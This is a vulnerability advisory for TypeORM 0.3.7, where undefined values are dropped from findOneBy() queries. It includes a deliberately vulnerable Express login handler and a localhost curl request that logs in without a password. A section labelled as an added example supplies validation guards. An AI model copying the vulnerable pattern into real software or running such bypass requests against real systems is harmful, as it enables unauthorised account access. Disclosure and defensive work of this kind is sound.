TypeORM 0.3.7 Information Disclosure
TypeORM version 0.3.7 suffers from an information disclosure vulnerability.
I found what I think is a vulnerability in the latest typeorm, 0.3.7. TypeORM v0.3 has a new findOneBy() method instead of findOneById(), and it is the only way to get a record by id. Sending undefined as a value in this method removes this parameter from the query. This leads to the data exposure.

For example, Users.findOneBy({id: req.query.id}) with /?id=12345 produces

    SELECT * FROM Users WHERE id=12345 LIMIT 1

while removing id from the query string produces

    SELECT * FROM Users LIMIT 1

The maintainer also does not consider this a vulnerability and stated the root cause is bad input validation. I tried to contact Snyk, but they took the author's position. I still think it is a major vulnerability.

Vulnerable app:

import 'reflect-metadata'; // required by TypeORM's decorators
import {
  Entity, PrimaryGeneratedColumn, Column, Connection, ConnectionOptions,
  Repository, createConnection
} from 'typeorm';
import express from 'express';
import { Application, Request, Response } from 'express';

let connection: Connection;

// Vulnerable handler: the request body fields are passed straight to
// findOneBy(). If "password" is absent from the JSON body it is undefined,
// and TypeORM 0.3.7 drops that condition from the WHERE clause instead of
// rejecting it, so the lookup matches on email alone.
async function myListener(request: Request, response: Response) {
  if (!connection) connection = await createConnection(connectionOpts);
  const userRepo: Repository<User> = connection.getRepository(User);
  const { email, password }: Record<string, string> = request.body;
  const user = await userRepo.findOneBy({ email, password });
  return response.json(user ? 'ok' : 'denied');
}

@Entity({ name: 'Users' })
class User {
  @PrimaryGeneratedColumn()
  id!: number;

  @Column()
  email!: string;

  @Column()
  password!: string;
}

const connectionOpts: ConnectionOptions = {
  type: 'mysql',
  name: 'myconnection',
  host: 'localhost',
  username: 'root',
  password: 'test123',
  database: 'domurl',
  entities: [User]
};

const app: Application = express();
app.use(express.json());
app.post('/authenticate', myListener);
app.listen(4444, () => console.log('App started'));

Usage:

curl http://127.0.0.1:4444/authenticate -H 'Content-Type: application/json' --data '{"email": "[email protected]", "password": "incorrect"}'
"denied"⏎

Exploit:

curl http://127.0.0.1:4444/authenticate -H 'Content-Type: application/json' --data '{"email": "[email protected]"}'
"ok"⏎
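The following is an added example, not code from the advisory or from TypeORM, showing the input validation the maintainer points to as the fix: a body validator that requires every lookup field to be a non-empty string, and a guard that refuses any where-object containing an undefined or null criterion before it reaches findOneBy(). Because TypeORM and a database are not available here, the repository is replaced by a small in-memory stand-in (simulatedFindOneBy, with a constructed two-row users table) that mimics the 0.3.7 behaviour described above, skipping undefined criteria, so the difference between the unguarded and guarded handler is visible. The helper names assertCompleteWhere, requireStrings, simulatedFindOneBy and authenticate are this example's own.

```typescript
// Added example, not code from the advisory: input validation and a
// where-clause guard that stop undefined criteria from reaching findOneBy().

type Where = Record<string, unknown>;

// Reject any where-object that contains an undefined or null criterion.
// Wrap every findOneBy()/findOne({ where }) argument in this so a missing
// request field raises an error instead of widening the query.
function assertCompleteWhere<T extends Where>(where: T): T {
  const missing = Object.entries(where)
    .filter(([, v]) => v === undefined || v === null)
    .map(([k]) => k);
  if (missing.length > 0) {
    throw new Error(`refusing lookup: no value for ${missing.join(', ')}`);
  }
  return where;
}

// Validate a parsed JSON body: each required field must be a non-empty
// string. Non-string values are refused too, since arrays and objects would
// be read by the ORM as operators or nested criteria rather than literals.
function requireStrings(body: unknown, fields: string[]): Record<string, string> {
  if (typeof body !== 'object' || body === null || Array.isArray(body)) {
    throw new Error('body must be a JSON object');
  }
  const record = body as Record<string, unknown>;
  const out: Record<string, string> = {};
  for (const field of fields) {
    const value = record[field];
    if (typeof value !== 'string' || value.length === 0) {
      throw new Error(`field "${field}" must be a non-empty string`);
    }
    out[field] = value;
  }
  return out;
}

// Constructed sample table so the example runs without a database.
const users: Where[] = [
  { id: 1, email: 'alice@example.com', password: 'secret' },
  { id: 2, email: 'bob@example.com', password: 'hunter2' },
];

// Stand-in for the 0.3.7 findOneBy() behaviour described in the advisory:
// a criterion whose value is undefined is simply skipped. This is a local
// simulation, not TypeORM code.
function simulatedFindOneBy(where: Where): Where | null {
  const match = users.find((row) =>
    Object.entries(where).every(([k, v]) => v === undefined || row[k] === v),
  );
  return match ?? null;
}

// The advisory's /authenticate handler in both forms. With guarded=false the
// body fields go straight into the lookup (the vulnerable pattern); with
// guarded=true the body is validated and the where-object checked first.
function authenticate(body: unknown, guarded: boolean): 'ok' | 'denied' | 'rejected' {
  try {
    let where: Where;
    if (guarded) {
      where = assertCompleteWhere(requireStrings(body, ['email', 'password']));
    } else {
      const { email, password } = body as Record<string, unknown>;
      where = { email, password };
    }
    return simulatedFindOneBy(where) ? 'ok' : 'denied';
  } catch {
    return 'rejected';
  }
}
```

In the real handler the same two calls wrap the repository lookup, for example userRepo.findOneBy(assertCompleteWhere(requireStrings(request.body, ['email', 'password']))), so a body that omits "password" is answered with an error rather than a match on email alone. Applying assertCompleteWhere at every findOneBy() call site, not just the login route, also covers the Users.findOneBy({id: req.query.id}) case from the description, where a missing query parameter would otherwise return the first row of the table.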